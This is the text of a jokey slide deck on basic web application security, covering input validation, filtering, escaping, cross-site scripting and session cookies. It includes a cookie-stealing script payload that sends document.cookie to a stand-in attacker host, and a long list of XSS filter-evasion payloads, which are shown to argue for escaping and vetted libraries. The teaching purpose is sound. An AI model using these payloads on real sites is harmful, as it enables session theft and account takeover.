Basic Web Application Security

Basic WebApplication

Security

User Input

Kick Your Arse

Three Ways(All Awesome)

Validation

Passive(No touchy-touchy)

This is a Number.

2

This is not a Number.

a

This is really not a Number.

<script>alert(‘loldongs’)</script>

Filtering

Destructive(One-Way Street)

Only letting the good stuff in.

or

Keeping out the bad stuff.

What’s the diff?(Bro.)

Both can be error-prone...

White-Listing Usability Problems

What happens whenyou screw it up?

Black-Listing Security Problems

(Always a trade-off.)

Escaping

TransportPoint A Point B

Data will be the same on both sides.

Different Media,Different Escaping

HTML

<b>Huh.</b>

<p><i><b>Huh.</b></i></p>

<b>Huh</b>

SQL

Sam O’Brien

INSERT INTO mah_peeps (name)VALUES (‘Sam O\’Brien‘);

1, Sam O’Brien, 2010-09-02 18:30:00

XSS(Cross-Site Scripting)

(XTREME Site Scripting)

SS

Sticking Scripts Where They Don’t Belong.

You there, down the back.Stop sniggering.

<script>alert(‘HACKED BY LOLDONGS’)

</script>

Amateurs!

<script>alert(document.cookie)

</script>

Hmm.

<script>document.write(‘<img

src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”

style=“display:none;”>’);</script>

Oh shit.

Why is this uncool?

(Yeah! Why?)




Ooooh shit.




Oooooooooooh shit.




Oooooooooooooooooh shit.

Why is this really uncool?

(Because shut up.)

HTTP

Hyper-Text Thingy I-forgot-again

Stateless

No Idea Who You Are.

It can guess.(Badly.)

IP AddressBrowser User-Agent

Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every

request.)

The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1

Browser sends the ID every request.

PHPSESSID=123your456mum789




Look again.

THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-

Preventing Shenanigans

HTML

Validation Really Hard.

HTML

Filtering Still Really Hard.

Use a library, eg. HTML Purifier.

HTML

Escaping Dead Easy.

Most languages have stuff to handle this, eg.

htmlentities(), cgi.escape(), CGI.escape()

How hard is filtering?

(It’s just <script>, right?)

THIS HARD.

<IMG SRC=javascript:alert('a')>

<img src=javascript:alert("a")>

<img “””><script>alert('a')</script>”>

<IMG

SRC=javascr

ipt:ale&#1

14;

t('XSS')>

<IMG

SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72

&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72

&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29

>

<IMG SRC="jav ascript:alert('a');“>

(Well, then.)

<IMG SRC="jav as&#x09cript:alert('XSS');">

<IMG SRC="jav
ascript:alert('XSS');">

<SCR\0IPT>alert('a')</SCR\0IPT>

<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>

<img onmouseover!#$%&=alert('a')>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<script src=//foo/x.js>

<img src=”javascript:alert('a')”

THIS HARD.

<iframe src=http://foo/x.html <

<body background=”javascript:alert('a')”>

<BODY ONLOAD=alert('a')>

<img dynsrc=”javascript:alert('a')”>

<img lowsrc=”javascript:alert('a')”>

<BGSOUND SRC=javascript:alert('a')>

<BR SIZE=”&{alert('a')}”>

<LAYER SRC=”http://foo/x.html”></LAYER>

<link rel=”stylesheet” href=”javascript:alert('a');”>

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>BODY{-moz-binding:url("http://foo/

x.xml#xss")}</STYLE>

(Well, then.)

<IMG SRC='vbscript:msgbox(“a”)'>

<img src=”livescript:alert('a')”>

žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding

evasion)

<META HTTP-EQUIV=”refresh”

CONTENT=”0;url=javascript:alert('a');”>

<META HTTP-EQUIV="refresh"

CONTENT="0;url=data:text/html;base64,

PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME

SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

THIS HARD.<DIV STYLE="background-image:

url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\

0028'\006a

\

0061\0076\0061\0073\0063\0072\0069\0070\0074\003

a\0061

\006c\

0065\0072\0074\0028.1027\0058.1053\0053\0027\002

9'\0029">

<DIV STYLE="background-image:

url(javascript:alert('a'))">

<DIV STYLE="width: expression(alert('a'));">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">

exp/*<A

STYLE='no\xss:noxss("*//*");xss:ex/*XSS*/

/*/*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

(Well, then.)

<STYLE>.x{background-

image:url("javascript:alert('a')");}</STYLE><A

CLASS=X></A>

<BASE HREF="javascript:alert('a');//">

<OBJECT TYPE="text/x-scriptlet"

DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf"

AllowScriptAccess="always"></EMBED>

<EMBED

SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczp

zd....jwvc3ZnPg=="

type="image/svg+xml"

AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG

SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C

DATAFORMATAS=HTML></SPAN>

And one last thing.

(Groan.)

Remember <script>alert()</script>

?

(Yes, I do. Shut up.)

alert() can be ANY JAVASCRIPT.

(Yes, and...?)

Do you have any forms on your page?

(Yes.)

Do you have any javascript functions your site uses to do anything

useful?

(... Yes.)

Do your site make any AJAX calls to do anything useful?

(... Oh.)

That injected code can trigger forms, run

javascript functions, or make AJAX calls.

(... Oooooh.)

Send someone to a link that looks like:

http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)

Or store something that will output this on someone’s profile

page:

<script>doStuff();</script>

(... Oooooooooooooooh.)

... And you’re hosed.

(Shit.)

The Human Element

Touchy-Feely Commie Bullshit.

a

Touchy-Feely Commie Bullshit.

Documents

Basic Web Application Security